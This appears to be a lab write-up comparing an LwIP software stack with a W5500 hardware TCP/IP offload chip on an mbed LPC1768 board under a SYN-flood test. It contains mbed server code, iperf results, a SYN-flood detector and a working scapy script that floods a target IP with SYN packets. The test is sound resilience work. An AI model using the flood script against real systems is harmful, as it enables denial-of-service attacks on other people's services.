Firewall for Internet of Things

Intro

**What is a firewall for IoT?**
– We compare the traditional method (software TCP/IP stack) and the proposed method (hardware TCP/IP offload) under a DoS attack (SYN-flood attack).

IoT Platform: mbed NXP LPC1768

mbed LPC1768

It is based on the NXP LPC1768, with a 32-bit ARM Cortex-M3 core running at 96MHz. It includes 512KB FLASH, 32KB RAM and lots of interfaces including built-in Ethernet, USB Host and Device, CAN, SPI, I2C, ADC, DAC, PWM and other I/O interfaces. The pinout above shows the commonly used interfaces and their locations. Note that all the numbered pins (p5-p30) can also be used as DigitalIn and DigitalOut interfaces.
– Link1: For more detail

Traditional method: LwIP (TCP/IP software stack) + Ethernet MAC (LPC1768) + Ethernet PHY (DP83848J)@mbed application board (Ethernet connector)

mbed application board
* Feature list
* 128×32 Graphics LCD
* 5 way joystick
* 2 x Potentiometers
* 3.5mm Audio jack (Analog Out)
* Speaker, PWM connected
* 3 Axis ±1.5g Accelerometer
* 3.5mm Audio jack (Analog In)
* 2x Servo motor headers
* RGB LED, PWM connected
* USB-mini-B Connector
* Temperature sensor
* Socket for Xbee (Zigbee) or RN-XV (Wifi)
* RJ45 Ethernet Connector
* USB-A Connector
* 1.3mm DC Jack input

Proposed method: WIZ550io (TOE + Ethernet MAC + Ethernet PHY)

WIZ550io
– Link3: WIZ550io components in mbed.org
– Link4: W5500 components in mbed.org

Application for iperf

Recv only code for Software stack

  • Modified from the echo server example on mbed (receive only, nothing is echoed back).
#include "mbed.h"
#include "EthernetInterface.h"

// Receive-only TCP server on the LwIP software stack (built-in Ethernet MAC + DP83848J PHY).
EthernetInterface eth;

int main()
{
    printf("Trying\r\n");
    // Static addressing; change the IP address, mask and gateway to match your network.
    int ret = eth.init("192.168.77.34", "255.255.255.0", "192.168.77.1");

    if (!ret) {
        printf("Initialized, MAC: %s\n\r", eth.getMACAddress());
        printf("Connected, IP: %s, MASK: %s, GW: %s\n\r",
               eth.getIPAddress(), eth.getNetworkMask(), eth.getGateway());
    } else {
        printf("Error eth.init() - ret = %d\n\r", ret);
        return -1;
    }

    eth.connect();   // bring the interface up with the configured addresses
    printf("IP Address is %s\n", eth.getIPAddress());

    TCPSocketServer server;
    server.bind(5000);
    server.listen();

    while (true) {
        printf("\nWait for new connection...\n");
        TCPSocketConnection client;
        server.accept(client);
        client.set_blocking(false, 1500); // receive() gives up after 1.5 s

        printf("Connection from: %s\n", client.get_address());

        // Drain whatever the client (iperf) sends; the data is discarded.
        char buffer[2048];
        while (true) {
            int n = client.receive(buffer, sizeof(buffer));
            if (n < 0) break; // connection closed or receive timed out
        }
        client.close();
    }
}

Recv only code for TOE

#include <stdio.h>
#include <string.h>
#include "mbed.h"
#include "EthernetInterface.h"   // WIZnet port of the interface for the WIZ550io (W5500)

// Receive-only TCP server on the W5500 TCP/IP offload engine, driven over SPI.
//DigitalOut myled(LED1);
//Serial pc(USBTX , USBRX);
int main() {

    printf("Test - WIZ550io\r\n");

    SPI spi(p5, p6, p7); // mosi, miso, sclk

    /** Set the SPI bus clock frequency
     *
     *  @param hz SCLK frequency in Hz (default = 1MHz)
     *  Maximum SPI data bit rate of 12.5 Mbit/s in LPC176X
     */
    spi.frequency(12500000);   // the SPI object must exist before its clock is set
    EthernetInterface eth(&spi, p8, p11); // spi, cs, reset

    // Static addressing; change the IP address, mask and gateway to match your network.
    int ret = eth.init("192.168.77.34", "255.255.255.0", "192.168.77.1");
    if (!ret) {
        printf("Initialized, MAC: %s\n\r", eth.getMACAddress());
        printf("Connected, IP: %s, MASK: %s, GW: %s\n\r",
               eth.getIPAddress(), eth.getNetworkMask(), eth.getGateway());
    } else {
        printf("Error eth.init() - ret = %d\n\r", ret);
        return -1;
    }

    eth.connect();   // write the configured addresses to the W5500 and bring the link up
    printf("IP Address is %s\n", eth.getIPAddress());

    TCPSocketServer server;
    server.bind(5000);
    server.listen();

    while (true) {
        printf("\nWait for new connection...\n");
        TCPSocketConnection client;
        server.accept(client);
        client.set_blocking(false, 1500); // receive() gives up after 1.5 s

        printf("Connection from: %s\n", client.get_address());

        // Drain whatever the client (iperf) sends; the data is discarded.
        char buffer[2048];
        while (true) {
            int n = client.receive(buffer, sizeof(buffer));
            if (n < 0) break; // connection closed or receive timed out
        }
        client.close();
    }
}

Comparison of memory size

  • Fig. Code listings and compiler memory usage: software stack (LwIP) vs. TOE (W5500)

35.2kB(110%) : The LPC1768 has 3 RAM banks: One general purpose one of 32kB, and two additional ones of 16kB each for Ethernet/USB/CAN purposes. Ethernet completely fills one of those additional banks. The online compiler does take this into account for the total RAM usage, but assumes only 32kB is available, so it gets over the 100% what it displays, still will work fine though. (from mbed.org: http://developer.mbed.org/questions/3579/mbed-LPC-1768-RAM-Usage-128-what-does-th/)

**TOE can reduce the flash and RAM usage by 7% and 119% respectively.**

DoS Attack (Syn-flood attack)

We used the Python library scapy to generate the SYN-flood traffic for the DoS test.

from scapy.all import *

# Interval between two packets, in seconds; a shorter interval means heavier load on the board.
inter = float(input('inter (time in seconds to wait between 2 packets): '))

def synFlood(src, tgt, inter):
    IPlayer = IP(src=src, dst=tgt)
    # "S" (SYN only) is scapy's default TCP flag; as your env. change source and destination port
    TCPlayer = TCP(sport=3000, dport=3000, flags="S")
    pkt = IPlayer / TCPlayer
    send(pkt, loop=1, inter=inter)  # repeat the same segment until interrupted

#send(pkts, inter=0, loop=0, verbose=None)
#  Send packets at layer 3, using the conf.L3socket supersocket. pkts can
#  be a packet, an implicit packet or a list of them.
#
#  loop: send the packets endlessly if not 0.
#  inter: time in seconds to wait between 2 packets
#  verbose: override the level of verbosity. Make the function totally silent when 0.
#   * Refer to http://www.secdev.org/projects/scapy/files/scapydoc.pdf for more detail.


# as your env. change to real IP address and so on.
src = "192.168.77.253" # PC IP address
tgt = "192.168.77.34"  # target board (LPC1768)

synFlood(src, tgt, inter)

How to use iperf

Iperf is a tool to measure maximum TCP bandwidth, allowing the tuning of various parameters and UDP characteristics. Iperf reports bandwidth, delay jitter and datagram loss.

# ex.) host IP (192.168.77.34), port 5000, display format Mbit/sec, report interval 1 sec.
>iperf.exe -c 192.168.77.34 -p 5000 -f m -i 1
  • -c : --client <host>, connect to the specified host.
  • -p : --port #, the server port to connect to (the port the server listens on).
  • -f : --format [], 'm' = Mbit/sec
  • -i : --interval #, sets the interval in seconds between periodic bandwidth reports.
  • Fig. Throughput performance

Network Configuration

  • **Fig. Network configurations to measure performance**

Network performance

  • Fig. Traditional method: lwIP performance according to the traffic of SYN packets (SW bandwidth)

  • Fig. Proposed method: TOE (W5500) performance according to the traffic of SYN packets (TOE (W5500) bandwidth)

**The network performance of the traditional method is better than that of the proposed method when the DoS attack is weak, because the traditional method uses the bus interface for the MAC (the proposed method does not use SPI DMA).
However, the proposed method kept up its network performance under the SYN-flood attack.
In contrast, the network performance of the traditional method became extremely worse depending on the interval of the SYN attack.**
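As a defender's complement to the SYN-flood script and the throughput results above, here is an added example (not code from the original post): a small detector that reads one-line "tcpdump -n" TCP summaries and raises an alert when a listener accumulates unanswered SYNs, the condition that starves the software stack in the measurements. The capture lines are constructed, and the line format, the 1 s window and the threshold of 8 half-open attempts are assumptions.

```python
import re
from collections import defaultdict, deque
LINE_RE = re.compile(r"^(?P<ts>\d+:\d+:\d+\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
                     r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]")

def parse_line(line):
    """Parse one 'tcpdump -n' TCP summary line into (seconds, src, dst, dport, flags)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    h, mi, s = m.group("ts").split(":")
    return (int(h) * 3600 + int(mi) * 60 + float(s),
            m.group("src"), m.group("dst"), int(m.group("dport")), m.group("flags"))

def detect_syn_flood(lines, window=1.0, max_half_open=8):
    """Return (ts, (dst, dport), count) once per listener whose unanswered SYNs
    inside `window` seconds reach max_half_open. A pure SYN opens an entry, the
    same client's bare ACK (third handshake step) closes one, old ones time out."""
    pending = defaultdict(deque)   # (src, dst, dport) -> SYN timestamps not yet ACKed
    alerts, seen = [], set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, dst, dport, flags = rec
        key = (src, dst, dport)
        if flags == "S":                       # new handshake attempt
            pending[key].append(ts)
        elif flags == "." and pending[key]:    # handshake completed by this client
            pending[key].popleft()
        for q in pending.values():             # age out attempts older than the window
            while q and ts - q[0] > window:
                q.popleft()
        load = defaultdict(int)                # unanswered SYNs per listening socket
        for (_, d, p), q in pending.items():
            load[(d, p)] += len(q)
        for listener, n in load.items():
            if n >= max_half_open and listener not in seen:
                seen.add(listener)
                alerts.append((ts, listener, n))
    return alerts

# Constructed capture: one client completes a handshake with the board, then one host
# sends ten SYNs from a fixed source port in 0.9 s, as the scapy script above would.
SAMPLE = """\
12:00:00.000000 IP 192.168.77.10.40000 > 192.168.77.34.5000: Flags [S], seq 1, win 64240, length 0
12:00:00.000500 IP 192.168.77.34.5000 > 192.168.77.10.40000: Flags [S.], seq 7, ack 2, win 2048, length 0
12:00:00.001000 IP 192.168.77.10.40000 > 192.168.77.34.5000: Flags [.], ack 8, win 64240, length 0
""" + "".join(f"12:00:01.{i * 100000:06d} IP 192.168.77.253.3000 > 192.168.77.34.5000: "
              f"Flags [S], seq 0, win 8192, length 0\n" for i in range(10))
```

Run `detect_syn_flood(SAMPLE.splitlines())` to get one alert for 192.168.77.34:5000 at the eighth unanswered SYN; the same function can be fed `tcpdump -n -l` output captured on the mirror port of the test network.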
